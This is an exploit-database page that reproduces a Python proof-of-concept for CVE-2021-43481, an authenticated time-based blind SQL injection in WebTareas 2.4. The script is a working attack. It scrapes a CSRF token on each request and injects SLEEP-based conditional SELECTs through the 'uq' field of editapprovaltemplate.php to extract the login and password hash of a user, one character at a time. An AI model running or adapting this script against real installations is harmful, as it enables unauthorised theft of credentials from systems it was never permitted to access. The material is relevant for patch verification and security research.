Advertisement






WebTareas 2.4 SQL Injection

CVE Category Price Severity
CVE-2021-43481 CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') $1,000 High
Author Risk Exploitation Type Date
CyberXploit High Remote 2022-05-11
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022050047

Below is a copy:

WebTareas 2.4 SQL Injection
# Exploit Title: WebTareas 2.4 - Blind SQLi (Authenticated)
# Date: 04/20/2022
# Exploit Author: Behrad Taher
# Vendor Homepage: https://sourceforge.net/projects/webtareas/
# Version: < 2.4p3
# CVE : CVE-2021-43481

#The script takes 3 arguments: IP, user ID, session ID
#Example usage: python3 webtareas_sqli.py 127.0.0.1 1 4au5376dddr2n2tnqedqara89i

import requests, time, sys
from bs4 import BeautifulSoup
ip = sys.argv[1]
id = sys.argv[2]
sid = sys.argv[3]

def sqli(column):
    print("Extracting %s from user with ID: %s\n" % (column,id))
    extract = ""
    for i in range (1,33):
        #This conditional statement will account for variable length usernames
        if(len(extract) < i-1):
            break
        for j in range(32,127):
            injection = "SELECT 1 and IF(ascii(substring((SELECT %s FROM gW8members WHERE id=1),%d,1))=%d,sleep(5),0);" % (column,i,j)
            url = "http://%s/approvals/editapprovaltemplate.php?id=1" % ip
            GET_cookies = {"webTareasSID": "%s" % sid}
            r = requests.get(url, cookies=GET_cookies)
            #Because the app has CSRF protection enabled we need to send a get request each time and parse out the CSRF Token"
            token = BeautifulSoup(r.text,features="html.parser").find('input', {'name':'csrfToken'})['value']
            #Because this is an authenticated vulnerability we need to provide a valid session token
            POST_cookies = {"webTareasSID": "%s" % sid}
            POST_data = {"csrfToken": "%s" % token, "action": "update", "cd": "Q", "uq": "%s" % injection}
            start = time.time()
            requests.post(url, cookies=POST_cookies, data=POST_data)
            end = time.time() - start
            if end > 5:
                extract += chr(j)
                print ("\033[A\033[A")
                print(extract)
                break
#Modularized the script for login and password values
sqli("login")
sqli("password")
            

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.